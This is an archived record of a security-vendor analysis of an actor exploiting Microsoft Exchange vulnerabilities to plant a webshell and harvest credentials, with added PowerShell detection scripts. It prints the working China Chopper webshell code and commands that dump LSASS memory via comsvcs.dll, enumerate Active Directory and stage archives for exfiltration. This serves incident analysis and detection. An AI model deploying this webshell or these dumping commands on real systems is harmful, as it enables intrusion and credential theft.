{
	"id": "efb71e38-f306-46bc-809f-964bfb89ba1e",
	"created_at": "2026-04-06T00:06:51.439739Z",
	"updated_at": "2026-04-10T13:12:40.540279Z",
	"deleted_at": null,
	"sha1_hash": "ba5c5b4a201cd3bcd09deb529df534ab917dc353",
	"title": "Actor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Harvesting of Credentials",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 321609,
	"plain_text": "Actor Exploits Microsoft Exchange Server Vulnerabilities, Cortex XDR Blocks Harvesting of Credentials\r\nBy Robert Falcone\r\nPublished: 2021-04-15 · Archived: 2026-04-05 14:22:28 UTC\r\nExecutive Summary\r\nThe recently discovered and patched Microsoft Exchange vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065) have garnered considerable attention because of their mass exploitation and the severity of impact each successful exploitation has on the affected organization. On March 6, 2021, an unknown actor exploited these vulnerabilities in Microsoft Exchange Server to install a webshell on a server at a financial institution in the EMEA (Europe, the Middle East and Africa) region. While we did not have access to the webshell itself, it is likely a variant of the China Chopper server-side JScript.\r\nSix days after installing the webshell, on March 12, 2021, the actor used it to run scripts that gathered information from the local server and from Active Directory and dumped credentials from the compromised Exchange server. The actor then compressed the files produced by the information gathering and credential harvesting into cabinet files saved in a folder that the Internet Information Services (IIS) server serves to the internet, and attempted to exfiltrate those cabinet files by requesting them directly on March 12 and 13, 2021.\r\nWe analyzed the IP addresses of the inbound requests that ran commands via the installed webshell, as well as of the requests that tried to download the resulting files. None of the observed IP addresses appear to be actor-owned infrastructure; they likely represent a sampling of freely available proxies, VPNs and compromised servers. 
The IP addresses seen in the logs did not provide any pivot points to additional activity.\r\nUnit 42 analysts believe that the actor automated interaction with the webshell to run the two separate scripts. The two scripts executed via the webshell were issued three seconds apart from two different inbound IP addresses. It appears that the automation also included a deliberate switch of IP addresses to make analyzing and correlating the activity more cumbersome. The automation is one clue that the actor carried out this specific attack as part of a more extensive campaign.\r\nFortunately, the actor's credential harvesting at the financial institution in EMEA was unsuccessful, as the inbound requests to download the memory dump of the LSASS process failed. As an additional layer of protection, the Exchange server had Cortex XDR installed with the Password Theft Protection module enabled. This removed pointers to the desired credentials from the dumped memory, which would have thwarted the actor's ability to easily extract credentials from the memory dump using Mimikatz even if they had downloaded the file successfully.\r\nIt appears that this is just one incident in a large-scale campaign carried out either by a single actor or by multiple actors using a common toolset. Unit 42 found 177 webshells that share several attributes and behave similarly to the webshell the actor used in this incident. 
The organizations impacted by these related webshells were in various industries and geographic locations, which suggests the associated actor(s) are opportunistic and likely used scanning to find Exchange servers to compromise rather than working from a set list of targets.\r\nPalo Alto Networks customers are protected against Microsoft Exchange Server attacks with Next-Generation Firewalls with Threat Prevention and URL Filtering security subscriptions, Cortex XDR and Cortex XSOAR.\r\nWebshell Activity\r\nUnit 42 observed an actor interacting with webshells on Microsoft Exchange servers at six different organizations on March 11 and 12, 2021. To understand the actor’s activity in these attacks, we analyzed Internet Information Services (IIS) logs from one of the compromised Exchange servers, which allowed us to observe the inbound web requests to the webshell and the associated process activity. We used the timestamps in these logs to build a timeline of activity associated with this particular actor and incident, which we will refer to as the attack in the rest of this analysis. Figure 1 shows the timeline, which starts from the beginning of the activity on March 6, 2021. As shown, there is a six-day gap before the post-exploitation activities kick off on March 12, 2021.\r\nhttps://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/\r\nPage 1 of 3\n\nFigure 1. Timeline of actor’s activities associated with the Exchange server.\r\nAccording to the logs, on March 6, 2021 at 2:38:16 AM, the actor installed a webshell on the Exchange server by saving it to C:\\inetpub\\wwwroot\\aspnet_client\\supp0rt.aspx. This path is within the IIS server’s web root, so the server serves the webshell to anyone who navigates to /aspnet_client/supp0rt.aspx. 
The URL /aspnet_client/supp0rt.aspx is not unique to this attack, as Unit 42 has seen this URL used for webshells in many Exchange-related attacks, as mentioned in a previous blog, “Hunting for the Recent Attacks Targeting Microsoft Exchange.” According to a recent CISA report, the supp0rt.aspx used in Exchange-related attacks was an Offline Address Book (OAB) configuration file with a webshell added to the “ExternalUrl” field.\r\nWhile we did not have access to the supp0rt.aspx file used in this specific attack, we were able to analyze 177 supp0rt.aspx files with similar functionality. Each of the analyzed files contained China Chopper’s server-side JScript, which evaluates code supplied in a request parameter whose name consists of 32 alphanumeric characters and differs from file to file (both names observed in this report are lowercase hexadecimal, which is a useful hunting pattern). For example, the following code was extracted from a supp0rt.aspx webshell; on every page load it base64-decodes the value of the parameter 54242e9b610a7ca15024a784969c9e0d and passes it to JScript.NET's eval, so the actor can run arbitrary server-side code with each request:\r\n\u003cscript language=\"JScript\" runat=\"server\"\u003efunction Page_Load()\r\n{eval(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request.Item[\"54242e9b610a7ca15024a784969c9e0d\"])),\"unsafe\");}\r\n\u003c/script\u003e\r\nIn this attack, we observed the actor providing code to execute to the supp0rt.aspx webshell within a parameter named 6b83ccc96b4abd4cea1c7c607688a8ad. We believe with high confidence that the actor used the same webshell code in these attacks, as seen above, but with the 6b83ccc96b4abd4cea1c7c607688a8ad parameter in place of 54242e9b610a7ca15024a784969c9e0d. 
While China Chopper’s server-side JScript is readily available online, we believe that the combination of the same webshell, the supp0rt.aspx filename and the use of a random 32-character parameter name to run code suggests either a common actor or shared tooling across multiple actors.\r\nWe do not know exactly which IP address the actor used to exploit the server and install the webshell, as there were several successful HTTP POST requests to /ecp/program.js that attempted to exploit the Exchange vulnerability within a minute of the supp0rt.aspx file being written to disk. The path /ecp/program.js does not appear unique to this attack either, as other security researchers have reported seeing it used to exploit Exchange Server (CVE-2021-26855). All the successful requests used the user-agent ExchangeServicesClient/0.0.0.0 and came from the following IP addresses:\r\n156.194.127[.]178\r\n112.160.243[.]172\r\n221.179.87[.]175\r\n73.184.77[.]174\r\n41.237.156[.]15\r\n223.16.210[.]90\r\n63.76.255[.]110\r\n218.103.234[.]104\r\n83.110.215[.]7\r\nAfter several days of inactivity, the actor first accessed the webshell on March 12, 2021, at 2:35:27, by sending a request to /aspnet_client/supp0rt.aspx from 121.150.12[.]35. The HTTP request included the parameter 6b83ccc96b4abd4cea1c7c607688a8ad, whose value was a base64-encoded script that the webshell decodes and evaluates. 
The following script (JScript.NET evaluated server-side by the webshell, not PowerShell) lists the running processes with their PIDs, base64-encodes the list and writes it into the response between the marker strings oamoisjmdo and sodknousfnfdklj, which lets the actor's client locate the result inside the returned page:\r\nvar p=System.Diagnostics.Process.GetProcesses();var str=\"\";for(var i=0;i\u003cp.Length;i++)\r\n{str+=p[i].ProcessName+\":\"+p[i].Id+\"\\r\\n\";}\r\nstr=Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(str));str=\"oamoisjmdo\"+str+\"sodknousfnfdklj\";Response.Write(str);\r\nThe actor enumerated the running processes to find the process identifier (PID) of the Local Security Authority Subsystem Service (LSASS) process in order to dump its memory for credential harvesting. The actor used the PID of LSASS (584, seen in the batch script below) within a second script uploaded to the same webshell at /aspnet_client/supp0rt.aspx within the 6b83ccc96b4abd4cea1c7c607688a8ad parameter. The actor uploaded the second script to the webshell three seconds after the first, on March 12, 2021, at 2:35:30, this time from a different IP address, 164.68.156[.]31. The short interval between the two inbound requests to the webshell, coupled with the switch of IP addresses, suggests that the actor has automated this process to some extent. Unit 42 believes the actor automated their interactions with the webshell to scale their operation, which allowed them to carry out post-exploitation activities on a long list of compromised Exchange servers. 
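\r\nThe request patterns in this section (exploitation POSTs to /ecp/program.js with the ExchangeServicesClient/0.0.0.0 user-agent, requests to an .aspx file under /aspnet_client/, and webshell requests only seconds apart from different source IPs) can be hunted for in IIS W3C logs. The following PowerShell script is an added example written for this page, not code from Unit 42 or recovered from the actor: the log lines are constructed to mirror the article's timeline (the server IP 10.0.0.5, the placeholder file names and the five-second burst window are assumptions), and the parser reads the #Fields header so it works with whatever column set a real IIS site logs.\r\n```powershell\r\n# Added example (not code from the Unit 42 post): hunt IIS W3C logs for the request\r\n# patterns described in the article. $sampleLog is constructed data modelled on the\r\n# article's timeline; the server IP 10.0.0.5 and the file names are placeholders.\r\n$sampleLog = @'\r\n#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status\r\n2021-03-06 02:38:05 10.0.0.5 POST /ecp/program.js - 156.194.127.178 ExchangeServicesClient/0.0.0.0 200\r\n2021-03-06 02:38:16 10.0.0.5 POST /ecp/program.js - 112.160.243.172 ExchangeServicesClient/0.0.0.0 200\r\n2021-03-12 02:35:27 10.0.0.5 POST /aspnet_client/supp0rt.aspx - 121.150.12.35 - 200\r\n2021-03-12 02:35:30 10.0.0.5 POST /aspnet_client/supp0rt.aspx - 164.68.156.31 - 200\r\n2021-03-12 10:07:09 10.0.0.5 GET /aspnet_client/f4REDACTED9b.dmp.zip - 45.77.140.214 Mozilla/5.0+(Windows+NT+6.1;+Trident/7.0;+rv:11.0)+like+Gecko 200\r\n2021-03-12 10:07:10 10.0.0.5 GET /aspnet_client/f4REDACTED9b1.dmp.zip - 45.77.140.214 Mozilla/5.0+(Windows+NT+6.1;+Trident/7.0;+rv:11.0)+like+Gecko 404\r\n2021-03-12 10:30:00 10.0.0.5 GET /owa/auth/logon.aspx - 198.51.100.7 Mozilla/5.0 200\r\n'@\r\n\r\nfunction Import-IisLog {\r\n    # Parse W3C extended log lines into objects, using the #Fields header for column names.\r\n    param([string[]]$Lines)\r\n    $fields = @()\r\n    foreach ($line in $Lines) {\r\n        if ($line -like '#Fields:*') { $fields = ($line -replace '^#Fields:\\s*', '') -split '\\s+'; continue }\r\n        if ($line -like '#*' -or [string]::IsNullOrWhiteSpace($line)) { continue }\r\n        $values = $line -split '\\s+'\r\n        $row = [ordered]@{}\r\n        for ($i = 0; $i -lt $fields.Count; $i++) { $row[$fields[$i]] = $values[$i] }\r\n        # IIS logs date and time as separate UTC columns; merge them into one timestamp.\r\n        $row['Timestamp'] = [datetime]::ParseExact(\"$($row['date']) $($row['time'])\", 'yyyy-MM-dd HH:mm:ss', [cultureinfo]::InvariantCulture)\r\n        [pscustomobject]$row\r\n    }\r\n}\r\n\r\nfunction Find-ExchangeWebshellActivity {\r\n    param([object[]]$Events, [int]$BurstSeconds = 5)   # BurstSeconds is an assumed threshold\r\n    $hits = New-Object System.Collections.Generic.List[object]\r\n    $add = { param($e, $why) $hits.Add([pscustomobject]@{ Time = $e.Timestamp; Source = $e.'c-ip'; Uri = $e.'cs-uri-stem'; Status = $e.'sc-status'; Indicator = $why }) }\r\n    foreach ($e in $Events) {\r\n        # 1. CVE-2021-26855 exploitation attempts: POST /ecp/program.js with the ExchangeServicesClient/0.0.0.0 user-agent.\r\n        if ($e.'cs-method' -eq 'POST' -and $e.'cs-uri-stem' -eq '/ecp/program.js' -and $e.'cs(User-Agent)' -eq 'ExchangeServicesClient/0.0.0.0') {\r\n            & $add $e 'exploit attempt: POST /ecp/program.js as ExchangeServicesClient/0.0.0.0'\r\n        }\r\n        # 2. Any .aspx under /aspnet_client/ is suspect; that folder normally holds only client-side script files.\r\n        if ($e.'cs-uri-stem' -match '^/aspnet_client/.+\\.aspx$') { & $add $e 'request to suspected webshell path' }\r\n        # 3. Dumps or archives fetched from the web root are staged exfiltration (404 means the file was not there yet).\r\n        if ($e.'cs-uri-stem' -match '^/aspnet_client/.+\\.(zip|cab|dmp|tmp)$') { & $add $e ('staged-file download, HTTP ' + $e.'sc-status') }\r\n    }\r\n    # 4. Automation signal: webshell requests only seconds apart but from different source IPs.\r\n    $shell = @($Events | Where-Object { $_.'cs-uri-stem' -match '^/aspnet_client/.+\\.aspx$' } | Sort-Object Timestamp)\r\n    for ($i = 1; $i -lt $shell.Count; $i++) {\r\n        $delta = ($shell[$i].Timestamp - $shell[$i - 1].Timestamp).TotalSeconds\r\n        if ($delta -le $BurstSeconds -and $shell[$i].'c-ip' -ne $shell[$i - 1].'c-ip') {\r\n            & $add $shell[$i] \"webshell requests $delta s apart from different IPs: likely automated\"\r\n        }\r\n    }\r\n    $hits\r\n}\r\n\r\nFind-ExchangeWebshellActivity -Events (Import-IisLog ($sampleLog -split '\\r?\\n')) | Format-Table -AutoSize\r\n```\r\nRun as-is, the script prints one row per indicator: the two supp0rt.aspx requests from 121.150.12[.]35 and 164.68.156[.]31 three seconds apart trigger the automation rule, and the 404 on the second .dmp.zip stands out as an exfiltration attempt for a file that was never served. On a real server, feed it Get-Content of the site's u_ex*.log files; the IIS-specific detail to keep in mind is that IIS replaces spaces in logged user-agents with plus signs, which is why the sample writes them that way.\r\n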
The second script contained the following, which saves a batch script to test.bat in the same web-served folder and executes it by creating a cmd.exe process (the base64 payload is truncated here; it decodes to the four batch commands shown below):\r\nSystem.IO.File.WriteAllBytes('c:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\test.bat',System.Convert.FromBase64String('cG93ZXJzaGVsbCBydW5kbGwzMi5leGUgYzpcd2luZG93c1xzeXN0ZW0zMlxjb21zdmNzLmRsbCBNaW...'));\r\nvar c=new System.Diagnostics.ProcessStartInfo('cmd.exe');\r\nvar e=new System.Diagnostics.Process();\r\ne.StartInfo=c;\r\nc.Arguments='/c c:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\test.bat';\r\ne.Start();\r\nThe test.bat batch script attempted to run the following four commands, which use the MiniDump export of comsvcs.dll (through rundll32.exe, wrapped in PowerShell) to write a full memory dump of LSASS (PID 584), dsquery to pull every attribute of every user object from Active Directory, and makecab to compress both results for exfiltration. Note that every output path is under c:\\inetpub\\wwwroot\\aspnet_client, the same web-served folder that holds the webshell, so the results could be retrieved with plain HTTP GET requests. Also note that makecab produces Microsoft Cabinet archives (beginning with the magic bytes MSCF) regardless of the .zip extension the actor chose, which matters for file-type based detections:\r\npowershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 584 c:\\inetpub\\wwwroot\\aspnet_client\\f4[redacted]9b1.tmp.dmp full\r\ndsquery * -limit 0 -filter objectCategory=person -attr * -uco \u003e c:\\inetpub\\wwwroot\\aspnet_client\\f4[redacted]9b.tmp\r\nmakecab c:\\inetpub\\wwwroot\\aspnet_client\\f4[redacted]9b1.tmp.dmp c:\\inetpub\\wwwroot\\aspnet_client\\f4[redacted]9b1.dmp.zip\r\nmakecab c:\\inetpub\\wwwroot\\aspnet_client\\f4[redacted]9b.tmp c:\\inetpub\\wwwroot\\aspnet_client\\f4[redacted]9b.dmp.zip\r\nSeveral hours later on March 12, 2021, at 10:07:09, the actor appears to have changed their IP address to 45.77.140[.]214 and successfully downloaded the cabinet file f4[redacted]9b.dmp.zip that contained the results of the dsquery command. Judging by the user-agent Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko, the actor downloaded this cabinet file by visiting its URL in an Internet Explorer 11 browser on a Windows 7 system. 
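\r\nThe test.bat chain above (w3wp.exe spawning cmd.exe, then powershell/rundll32 loading comsvcs.dll with the MiniDump argument, dsquery with -attr *, and makecab writing into the web root) is a distinctive process tree, and process-creation telemetry catches it at the moment the dump is written, well before any download attempt. The following PowerShell is an added example written for this page, not Unit 42's or the actor's code: the events are constructed and shaped like the Sysmon Event ID 1 / Security 4688 fields (Time, ProcessId, ParentProcessId, Image, CommandLine); PIDs, timestamps and paths are illustrative, and the LSASS PID 584 is taken from the batch script.\r\n```powershell\r\n# Added example (not code from the Unit 42 post): flag the test.bat process chain\r\n# (w3wp.exe -> cmd.exe -> powershell/rundll32 comsvcs.dll MiniDump, dsquery, makecab)\r\n# in process-creation telemetry. $procEvents is constructed data shaped like Sysmon\r\n# Event ID 1 / Security 4688 fields; PIDs, times and paths are illustrative.\r\n$procEvents = @(\r\n    [pscustomobject]@{ Time='2021-03-12 02:35:30'; ProcessId=4120; ParentProcessId=900;  Image='C:\\Windows\\System32\\inetsrv\\w3wp.exe'; CommandLine='w3wp.exe -ap \"MSExchangeOWAAppPool\"' }\r\n    [pscustomobject]@{ Time='2021-03-12 02:35:31'; ProcessId=5512; ParentProcessId=4120; Image='C:\\Windows\\System32\\cmd.exe'; CommandLine='cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat' }\r\n    [pscustomobject]@{ Time='2021-03-12 02:35:31'; ProcessId=5530; ParentProcessId=5512; Image='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'; CommandLine='powershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 584 c:\\inetpub\\wwwroot\\aspnet_client\\f4REDACTED9b1.tmp.dmp full' }\r\n    [pscustomobject]@{ Time='2021-03-12 02:35:32'; ProcessId=5544; ParentProcessId=5530; Image='C:\\Windows\\System32\\rundll32.exe'; CommandLine='rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 584 c:\\inetpub\\wwwroot\\aspnet_client\\f4REDACTED9b1.tmp.dmp full' }\r\n    [pscustomobject]@{ Time='2021-03-12 02:35:40'; ProcessId=5560; ParentProcessId=5512; Image='C:\\Windows\\System32\\dsquery.exe'; CommandLine='dsquery * -limit 0 -filter objectCategory=person -attr * -uco' }\r\n    [pscustomobject]@{ Time='2021-03-12 02:35:41'; ProcessId=5572; ParentProcessId=5512; Image='C:\\Windows\\System32\\makecab.exe'; CommandLine='makecab c:\\inetpub\\wwwroot\\aspnet_client\\f4REDACTED9b1.tmp.dmp c:\\inetpub\\wwwroot\\aspnet_client\\f4REDACTED9b1.dmp.zip' }\r\n    [pscustomobject]@{ Time='2021-03-12 02:40:00'; ProcessId=6001; ParentProcessId=1234; Image='C:\\Windows\\System32\\cmd.exe'; CommandLine='cmd.exe /c dir C:\\temp' }   # benign: not under w3wp.exe\r\n)\r\n\r\nfunction Get-ProcessAncestry {\r\n    # Follow ParentProcessId links and return the image names from the process up to the oldest ancestor we have.\r\n    param([object[]]$Events, [int]$ProcessId)\r\n    $byId = @{}\r\n    foreach ($e in $Events) { $byId[$e.ProcessId] = $e }\r\n    $chain = @()\r\n    $seen = @{}\r\n    $cur = $byId[$ProcessId]\r\n    while ($cur -and -not $seen.ContainsKey($cur.ProcessId)) {   # $seen guards against PID-reuse loops\r\n        $seen[$cur.ProcessId] = $true\r\n        $chain += [System.IO.Path]::GetFileName($cur.Image)\r\n        $cur = $byId[$cur.ParentProcessId]\r\n    }\r\n    $chain\r\n}\r\n\r\nfunction Find-LsassDumpChain {\r\n    param([object[]]$Events)\r\n    foreach ($e in $Events) {\r\n        $reasons = @()\r\n        $cmd = $e.CommandLine\r\n        $ancestry = @(Get-ProcessAncestry -Events $Events -ProcessId $e.ProcessId)\r\n        # comsvcs.dll's MiniDump export, whether rundll32 is called directly or wrapped in powershell.\r\n        if ($cmd -match '(?i)comsvcs(\\.dll)?\\b.*\\bMiniDump\\b') { $reasons += 'LSASS dump via comsvcs.dll MiniDump' }\r\n        # Every attribute of every person object with no result limit: bulk AD user enumeration.\r\n        if ($cmd -match '(?i)^dsquery\\b.*-limit 0.*-attr \\*') { $reasons += 'bulk AD user enumeration with dsquery' }\r\n        # Archives written into the web root are retrievable over HTTP, i.e. staged for exfiltration.\r\n        if ($cmd -match '(?i)^makecab\\b.*\\\\inetpub\\\\wwwroot\\\\') { $reasons += 'makecab staging output under inetpub\\wwwroot' }\r\n        # A shell whose ancestry includes the IIS worker process is the signature of webshell command execution.\r\n        if (($ancestry -contains 'w3wp.exe') -and ($ancestry[0] -in 'cmd.exe', 'powershell.exe')) { $reasons += 'shell spawned under w3wp.exe' }\r\n        if ($reasons.Count -gt 0) {\r\n            [pscustomobject]@{ Time = $e.Time; ProcessId = $e.ProcessId; Chain = ($ancestry -join ' \u003c- '); Reasons = ($reasons -join '; ') }\r\n        }\r\n    }\r\n}\r\n\r\nFind-LsassDumpChain -Events $procEvents | Format-Table -AutoSize -Wrap\r\n```\r\nOn a real host, replace $procEvents with objects built from Get-WinEvent (Sysmon Event ID 1 or Security 4688) that carry the same four properties. The ancestry walk is what separates the webshell-driven cmd.exe from the benign one at the end of the sample: both run cmd.exe, but only one descends from w3wp.exe. Note that in this incident the dump file was written and only became useless to Mimikatz afterwards, so the process chain is the earlier detection point.\r\n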
We looked at the f4[redacted]9b.dmp.zip file and found that it contained the f4[redacted]9b.tmp file, which was empty. This suggests that the dsquery command executed by the batch script did not successfully gather the user information from Active Directory.\r\nThen, one second later on March 12, 2021, at 10:07:10, the actor attempted to download the cabinet file containing the LSASS memory dump by making a GET request from 45.77.140[.]214 to /aspnet_client/f4[redacted]9b1.dmp.zip, but the server responded with a 404 Not Found error. The actor continued trying to download this file through March 12, 2021, at 17:35:15. There was then a break in activity until two more requests to download the file on March 13, 2021, at 05:40:05 and 05:40:06. All the requests to download the cabinet file were met with the same 404 error.\r\nLess than 20 minutes later on March 13, 2021, at 6:02:04 AM, the actor again changed their IP address, this time to 78.141.218[.]225, and continued attempting to download this cabinet file. The actor continued their attempts until March 13, 2021, at 16:33:03, issuing a total of 33 requests, all of which were met with HTTP 404 responses.\r\nWe looked at the f4[redacted]9b1.dmp file and it did contain the memory contents of the LSASS process, but we were unable to use Mimikatz to extract credentials from it. We confirmed that the Exchange server had Cortex XDR with the Password Theft Protection module enabled, which removed a pointer to the credentials from the dump file. 
This suggests that even if the actor had been able to download the f4[redacted]9b1.dmp.zip cabinet file containing the memory dump, they would have been unable to extract the sought-after credentials with Mimikatz for use in further activity against the organization.\r\nSource: https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/"
	],
	"report_names": [
		"exchange-server-credential-harvesting"
	],
	"threat_actors": [],
	"ts_created_at": 1775434011,
	"ts_updated_at": 1775826760,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ba5c5b4a201cd3bcd09deb529df534ab917dc353.pdf",
		"text": "https://archive.orkl.eu/ba5c5b4a201cd3bcd09deb529df534ab917dc353.txt",
		"img": "https://archive.orkl.eu/ba5c5b4a201cd3bcd09deb529df534ab917dc353.jpg"
	}
}